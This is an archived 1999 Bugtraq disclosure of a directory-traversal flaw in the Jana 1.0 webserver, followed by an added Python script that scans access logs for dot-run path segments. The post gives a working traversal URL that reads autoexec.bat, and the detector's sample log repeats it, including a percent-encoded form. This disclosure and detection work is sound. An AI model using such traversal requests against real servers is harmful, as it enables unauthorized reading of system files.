




Jana webserver exploit









=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Date: Fri, 08 Oct 1999  19:00:11
   From: Jason Lutz <jason@SPIS.NET>
     To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Jana webserver exploit
--------------------------------------------------------------------------------


Bugtraq,

I have found a security flaw in Jana 1.0 webserver. I have not been able to find out any information on who makes this product nor a place to download the web server package. This webserver seems to be included as a suite of Internet services, one of which I think is web-based chat. Enclosed is one exploit I have found in the limited time that I have had to deal with this web server. I am posting this information now so that one of you might know who makes this software and how I might be able to get in touch with them for further testing.

[root@foo whis]# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT
Server: Jana Server/1.40
Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
Content-Length: 38
Content-Type: text/html
Connection: close

<HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
[root@foo whis]#

http://server/....../autoexec.bat

Prints user's autoexec.bat


I would like to say thank you to rain.forest.puppy. for all his help.


Jason Lutz
Sprint Print Inc
jason@spis.net
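
A log check for the request shape shown in the post above, as an added example that is not part of the original message: it flags request paths that contain a segment made only of two or more dots, after percent-decoding. The access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# A path segment made only of dots, two or more: ".." and longer runs such as "......".
DOT_RUN = re.compile(r"^\.{2,}$")
# Request line as it appears quoted in a common-log-format entry (assumed format).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly (bounded) so %2e and %252e are seen as dots."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def dot_run_segments(target):
    """Return the dot-only segments (length >= 2) found in a request target's path."""
    # Drop the query string before decoding so an encoded '?' cannot hide the path.
    path = decode_fully(target.split("?", 1)[0])
    return [seg for seg in re.split(r"[/\\]", path) if DOT_RUN.match(seg)]

def suspicious_requests(log_lines):
    """Return (target, segments) for every logged request with a dot-only segment."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if match:
            segments = dot_run_segments(match.group(1))
            if segments:
                hits.append((match.group(1), segments))
    return hits

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/1999:18:59:44 +0000] "GET / HTTP/1.0" 200 38',
    '192.0.2.11 - - [04/Oct/1999:19:01:02 +0000] "GET /....../autoexec.bat HTTP/1.0" 200 412',
    '192.0.2.12 - - [04/Oct/1999:19:02:10 +0000] "GET /docs/v1.0/index.html HTTP/1.0" 200 900',
    '192.0.2.13 - - [04/Oct/1999:19:03:33 +0000] "GET /%2e%2e%2e%2e/autoexec.bat HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for target, segments in suspicious_requests(SAMPLE_LOG):
        print(target, segments)
```

The same segment test can serve as a request filter in front of a server: reject any request for which `dot_run_segments` returns a non-empty list before the path reaches the file system.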

